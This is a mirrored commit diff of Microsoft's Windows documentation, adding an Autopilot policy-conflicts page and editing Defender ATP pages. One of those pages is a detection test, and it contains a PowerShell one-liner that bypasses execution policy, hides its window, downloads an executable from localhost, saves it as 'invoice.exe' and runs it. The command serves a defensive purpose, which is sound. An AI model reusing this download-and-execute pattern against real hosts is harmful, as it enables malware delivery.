mirror of
https://github.com/MicrosoftDocs/windows-itpro-docs.git
synced 2025-05-12 13:27:23 +00:00
Merge branch 'master' of https://github.com/MicrosoftDocs/windows-docs-pr into WUFB1
This commit is contained in:
commit
6a46d6fcab
@ -1353,7 +1353,7 @@
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"source_path": "windows/security/threat-protection/microsoft-defender-atp/configure-splunk.md",
|
"source_path": "windows/security/threat-protection/microsoft-defender-atp/configure-splunk.md",
|
||||||
"redirect_url": "https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-siem-integration",
|
"redirect_url": "https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-siem",
|
||||||
"redirect_document_id": false
|
"redirect_document_id": false
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
|
@ -22,6 +22,7 @@
|
|||||||
## [DFCI management](dfci-management.md)
|
## [DFCI management](dfci-management.md)
|
||||||
## [Windows Autopilot update](autopilot-update.md)
|
## [Windows Autopilot update](autopilot-update.md)
|
||||||
## [Troubleshooting](troubleshooting.md)
|
## [Troubleshooting](troubleshooting.md)
|
||||||
|
## [Policy conflicts](policy-conflicts.md)
|
||||||
## [Known issues](known-issues.md)
|
## [Known issues](known-issues.md)
|
||||||
|
|
||||||
# Support
|
# Support
|
||||||
|
37
windows/deployment/windows-autopilot/policy-conflicts.md
Normal file
37
windows/deployment/windows-autopilot/policy-conflicts.md
Normal file
@ -0,0 +1,37 @@
|
|||||||
|
---
|
||||||
|
title: Windows Autopilot policy conflicts
|
||||||
|
ms.reviewer:
|
||||||
|
manager: laurawi
|
||||||
|
description: Inform yourself about known issues that may occur during Windows Autopilot deployment.
|
||||||
|
keywords: mdm, setup, windows, windows 10, oobe, manage, deploy, autopilot, ztd, zero-touch, partner, msfb, intune
|
||||||
|
ms.prod: w10
|
||||||
|
ms.mktglfcycl: deploy
|
||||||
|
ms.localizationpriority: medium
|
||||||
|
ms.sitesec: library
|
||||||
|
ms.pagetype: deploy
|
||||||
|
audience: itpro
|
||||||
|
author: mtniehaus
|
||||||
|
ms.author: mniehaus
|
||||||
|
ms.collection: M365-modern-desktop
|
||||||
|
ms.topic: article
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
|
# Windows Autopilot - Policy Conflicts
|
||||||
|
|
||||||
|
**Applies to**
|
||||||
|
|
||||||
|
- Windows 10
|
||||||
|
|
||||||
|
There are a sigificant number of policy settings available for Windows 10, both as native MDM policies and group policy (ADMX-backed) settings. Some of these can cause issues in certain Windows Autopilot scenarios as a result of how they change the behavior of Windows 10. If you encounter any of these issues, remove the policy in question to resolve the issue.
|
||||||
|
|
||||||
|
<table>
|
||||||
|
<th>Policy<th>More information
|
||||||
|
|
||||||
|
<tr><td width="50%">Device restriction / <a href="https://docs.microsoft.com/partner-center/regional-authorization-overview">Password policy</a>
|
||||||
|
<td>When certain <a href="https://docs.microsoft.com/windows/client-management/mdm/policy-csp-devicelock">DeviceLock policies</a>, such as minimum password length and password complexity, or any similar group policy settings, including any that disable auto-logon, are applied to a device, and that device reboots during the device Enrollment Status Page (ESP), the out-of-box experience or user desktop auto-logon could fail unexpectantly.
|
||||||
|
</table>
|
||||||
|
|
||||||
|
## Related topics
|
||||||
|
|
||||||
|
[Troubleshooting Windows Autopilot](troubleshooting.md)
|
@ -573,7 +573,6 @@
|
|||||||
##### [Understand threat intelligence concepts](microsoft-defender-atp/threat-indicator-concepts.md)
|
##### [Understand threat intelligence concepts](microsoft-defender-atp/threat-indicator-concepts.md)
|
||||||
##### [Learn about different ways to pull detections](microsoft-defender-atp/configure-siem.md)
|
##### [Learn about different ways to pull detections](microsoft-defender-atp/configure-siem.md)
|
||||||
##### [Enable SIEM integration](microsoft-defender-atp/enable-siem-integration.md)
|
##### [Enable SIEM integration](microsoft-defender-atp/enable-siem-integration.md)
|
||||||
##### [Configure Splunk to pull detections](microsoft-defender-atp/configure-splunk.md)
|
|
||||||
##### [Configure Micro Focus ArcSight to pull detections](microsoft-defender-atp/configure-arcsight.md)
|
##### [Configure Micro Focus ArcSight to pull detections](microsoft-defender-atp/configure-arcsight.md)
|
||||||
##### [Microsoft Defender ATP detection fields](microsoft-defender-atp/api-portal-mapping.md)
|
##### [Microsoft Defender ATP detection fields](microsoft-defender-atp/api-portal-mapping.md)
|
||||||
##### [Pull detections using SIEM REST API](microsoft-defender-atp/pull-alerts-using-rest-api.md)
|
##### [Pull detections using SIEM REST API](microsoft-defender-atp/pull-alerts-using-rest-api.md)
|
||||||
|
@ -27,7 +27,7 @@ ms.topic: article
|
|||||||
|
|
||||||
## Pull detections using security information and events management (SIEM) tools
|
## Pull detections using security information and events management (SIEM) tools
|
||||||
|
|
||||||
>[!Note]
|
>[!NOTE]
|
||||||
>- [Microsoft Defender ATP Alert](alerts.md) is composed from one or more detections.
|
>- [Microsoft Defender ATP Alert](alerts.md) is composed from one or more detections.
|
||||||
>- [Microsoft Defender ATP Detection](api-portal-mapping.md) is composed from the suspicious event occurred on the Machine and its related Alert details.
|
>- [Microsoft Defender ATP Detection](api-portal-mapping.md) is composed from the suspicious event occurred on the Machine and its related Alert details.
|
||||||
>- The Microsoft Defender ATP Alert API is the latest API for alert consumption and contain a detailed list of related evidence for each alert. For more information, see [Alert methods and properties](alerts.md) and [List alerts](get-alerts.md).
|
>- The Microsoft Defender ATP Alert API is the latest API for alert consumption and contain a detailed list of related evidence for each alert. For more information, see [Alert methods and properties](alerts.md) and [List alerts](get-alerts.md).
|
||||||
|
@ -30,19 +30,19 @@ ms.topic: article
|
|||||||
|
|
||||||
Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the Microsoft Defender ATP service.
|
Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the Microsoft Defender ATP service.
|
||||||
|
|
||||||
1. Create a folder: 'C:\test-WDATP-test'.
|
1. Create a folder: 'C:\test-MDATP-test'.
|
||||||
2. Open an elevated command-line prompt on the machine and run the script:
|
2. Open an elevated command-line prompt on the machine and run the script:
|
||||||
|
|
||||||
a. Go to **Start** and type **cmd**.
|
1. Go to **Start** and type **cmd**.
|
||||||
|
|
||||||
b. Right-click **Command Prompt** and select **Run as administrator**.
|
1. Right-click **Command Prompt** and select **Run as administrator**.
|
||||||
|
|
||||||

|

|
||||||
|
|
||||||
3. At the prompt, copy and run the following command:
|
3. At the prompt, copy and run the following command:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
|
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
|
||||||
```
|
```
|
||||||
|
|
||||||
The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes.
|
The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes.
|
||||||
|
Loading…
x
Reference in New Issue
Block a user